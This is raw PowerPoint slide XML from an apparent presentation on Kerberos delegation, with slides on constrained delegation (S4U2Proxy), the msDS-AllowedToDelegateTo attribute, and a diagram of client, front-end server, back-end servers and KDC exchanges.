        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Specify the SPNs to which the service account is allowed to connect</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Stored in accounts </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>msDS-AllowedToDelegateTo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> attribute</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Processes and Interactions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4366717" y="2060848"/>
            <a:ext cx="3829050" cy="4581525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="208862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p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2075750" y="2225875"/>
            <a:ext cx="320380" cy="2199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latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Kerberos Delegation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Text Placeholder 29"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="16"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Constrained Delegation (S4U2Proxy)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="54" name="グループ化 53"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5727220" y="1362143"/>
            <a:ext cx="1158241" cy="1244864"/>
            <a:chOff x="3522134" y="1490133"/>
            <a:chExt cx="1158241" cy="1244864"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="55" name="二等辺三角形 54"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3522134" y="1490133"/>
              <a:ext cx="1158241" cy="965200"/>
            </a:xfrm>
            <a:prstGeom prst="triangl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dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="56" name="Picture 3" descr="C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZEKS19L1\MC90043484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9976" y="1972733"/>
              <a:ext cx="762264" cy="762264"/>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テキスト ボックス 56"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6442426" y="2400453"/>
            <a:ext cx="511278" cy="299820"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>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lang="en-US" altLang="ja-JP" sz="1600" dirty="0">
                <a:ln w="3175">
                  <a:noFill/>
                </a:ln>
                <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>KDC</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="ja-JP" alt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58" name="正方形/長方形 57"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1147601" y="1844743"/>
            <a:ext cx="1128411" cy="966271"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFCC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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="59" name="Picture 2" descr="C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\W83A8CD0\MC900428969[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8286" y="1523450"/>
            <a:ext cx="431090" cy="59742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C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\W83A8CD0\MC900429015[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47440" y="2101477"/>
            <a:ext cx="309928" cy="464229"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="61" name="正方形/長方形 60"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4078708" y="4854413"/>
            <a:ext cx="1389231" cy="936788"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4">
              <a:lumMod val="20000"/>
              <a:lumOff val="8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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="66" name="Picture 2" descr="C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\RZPMF1M8\MC900432614[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94052" y="5139192"/>
            <a:ext cx="519228" cy="51922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3" descr="C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZEKS19L1\MC900434845[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67730" y="4602763"/>
            <a:ext cx="503297" cy="503297"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="78" name="正方形/長方形 77"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1735080" y="3840994"/>
            <a:ext cx="1389231" cy="1057833"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFCC"/>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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="79" name="Picture 2" descr="C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\RZPMF1M8\MC900432614[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13518" y="4155240"/>
            <a:ext cx="519228" cy="51922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4" descr="C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\W83A8CD0\MC900429015[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95380" y="4081618"/>
            <a:ext cx="309928" cy="464229"/>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3" descr="C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZEKS19L1\MC900434845[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24102" y="3589345"/>
            <a:ext cx="503297" cy="503297"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="82" name="正方形/長方形 81"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6082768" y="4854413"/>
            <a:ext cx="1389231" cy="936788"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4">
              <a:lumMod val="20000"/>
              <a:lumOff val="8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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="83" name="Picture 2" descr="C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\RZPMF1M8\MC900432614[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98112" y="5139192"/>
            <a:ext cx="519228" cy="519228"/>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3" descr="C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZEKS19L1\MC900434845[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1790" y="4602763"/>
            <a:ext cx="503297" cy="503297"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="85" name="テキスト ボックス 84"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1004737" y="2852414"/>
            <a:ext cx="1395333" cy="206532"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"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altLang="ja-JP" sz="1400">
                <a:ln w="3175">
                  <a:noFill/>
                </a:ln>
                <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Client computer</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="ja-JP" altLang="en-US" sz="14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86" name="テキスト ボックス 85"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1735080" y="4947552"/>
            <a:ext cx="1395333" cy="206532"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"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altLang="ja-JP" sz="1400">
                <a:ln w="3175">
                  <a:noFill/>
                </a:ln>
                <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Front-end Server</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="ja-JP" altLang="en-US" sz="14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87" name="テキスト ボックス 86"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4055998" y="5847545"/>
            <a:ext cx="1395333" cy="206532"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"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altLang="ja-JP" sz="1400">
                <a:ln w="3175">
                  <a:noFill/>
                </a:ln>
                <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Back-end Server</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="ja-JP" altLang="en-US" sz="14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88" name="テキスト ボックス 87"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6060059" y="5858170"/>
            <a:ext cx="1395333" cy="206532"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"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altLang="ja-JP" sz="1400">
                <a:ln w="3175">
                  <a:noFill/>
                </a:ln>
                <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Back-end Server</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="ja-JP" altLang="en-US" sz="14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89" name="テキスト ボックス 88"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1362973" y="2565706"/>
            <a:ext cx="697666" cy="206532"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"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altLang="ja-JP" sz="1400">
                <a:ln w="3175">
                  <a:noFill/>
                </a:ln>
                <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>user1</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="ja-JP" altLang="en-US" sz="14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90" name="テキスト ボックス 89"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2301511" y="4571202"/>
            <a:ext cx="697666" cy="206532"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"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altLang="ja-JP" sz="1400">
                <a:ln w="3175">
                  <a:noFill/>
                </a:ln>
                <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>user2</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="ja-JP" altLang="en-US" sz="14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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="93" name="直線矢印コネクタ 10"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2432746" y="2025942"/>
            <a:ext cx="3213675" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:headEnd type="arrow"/>
            <a:tailEnd type="arrow"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="2">
            <a:schemeClr val="accent1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:fillRef>
          <a:effectRef idx="1">
            <a:schemeClr val="accent1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="94" name="直線矢印コネクタ 10"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3268980" y="2565706"/>
            <a:ext cx="2583180" cy="1515912"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:headEnd type="arrow"/>
            <a:tailEnd type="arrow"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="2">
            <a:schemeClr val="accent1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:fillRef>
          <a:effectRef idx="1">
            <a:schemeClr val="accent1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="23" name="曲線コネクタ 22"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="78" idx="3"/>
            <a:endCxn id="61" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124311" y="4369911"/>
            <a:ext cx="1649013" cy="484502"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector2">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="50800">
            <a:solidFill>
              <a:srgbClr val="5191CD"/>
            </a:solidFill>
            <a:headEnd type="triangle"/>
            <a:tailEnd type="triangle" w="lg" len="med"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="97" name="曲線コネクタ 96"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="78" idx="3"/>
            <a:endCxn id="82" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124311" y="4369911"/>
            <a:ext cx="3653073" cy="484502"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector2">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="50800">
            <a:solidFill>
              <a:srgbClr val="5191CD"/>
            </a:solidFill>
            <a:headEnd type="triangle"/>
            <a:tailEnd type="triangle" w="lg" len="med"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="100" name="テキスト ボックス 99"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3369146" y="1779540"/>
            <a:ext cx="1395333" cy="206532"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"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altLang="ja-JP" sz="1400">
                <a:ln w="3175">
                  <a:noFill/>
                </a:ln>
                <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>AS/TGS Exchange</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="ja-JP" altLang="en-US" sz="14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101" name="テキスト ボックス 100"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="19776474">
            <a:off x="3608464" y="3195028"/>
            <a:ext cx="1395333" cy="206532"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"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altLang="ja-JP" sz="1400" b="1">
                <a:ln w="3175">
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>TGS Exchange</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="ja-JP" altLang="en-US" sz="1400" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln w="3175">
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
              <a:ea typeface="Verdana" pitchFamily="34" charset="0"/>
              <a:cs typeface="Verdana" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="102" name="テキスト ボックス 101"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="19776474">
            <a:off x="3774456" y="3291812"/>
            <a:ext cx="1793143" cy="206532"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"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altLang="ja-JP" sz="1400" b="1">
                <a:ln w="3175">
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>with Client’s Ticket</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="ja-JP" altLang="en-US" sz="1400" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln w="3175">
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
              <a:ea typeface="Verdana" pitchFamily="34" charset="0"/>
              <a:cs typeface="Verdana" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="103" name="テキスト ボックス 102"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="306658">
            <a:off x="4501501" y="4210466"/>
            <a:ext cx="1395333" cy="206532"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"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altLang="ja-JP" sz="1400">
                <a:ln w="3175">
                  <a:noFill/>
                </a:ln>
                <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>CS Exchange</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="ja-JP" altLang="en-US" sz="14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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="38" name="直線矢印コネクタ 10"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="12" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipV="1">
            <a:off x="1820900" y="2911095"/>
            <a:ext cx="1497532" cy="347072"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector2">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:headEnd type="arrow"/>
            <a:tailEnd type="arrow"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="2">
            <a:schemeClr val="accent1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:fillRef>
          <a:effectRef idx="1">
            <a:schemeClr val="accent1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41" name="テキスト ボックス 40"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2818117" y="2445854"/>
            <a:ext cx="1052843" cy="206532"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" indent="0" defTabSz="914363" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1400">
                <a:ln w="3175">
                  <a:noFill/>
                </a:ln>
                <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>CS Exchange</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="ja-JP" altLang="en-US" sz="14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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="236607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UI Light" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Kerberos Delegation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Text Placeholder 29"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
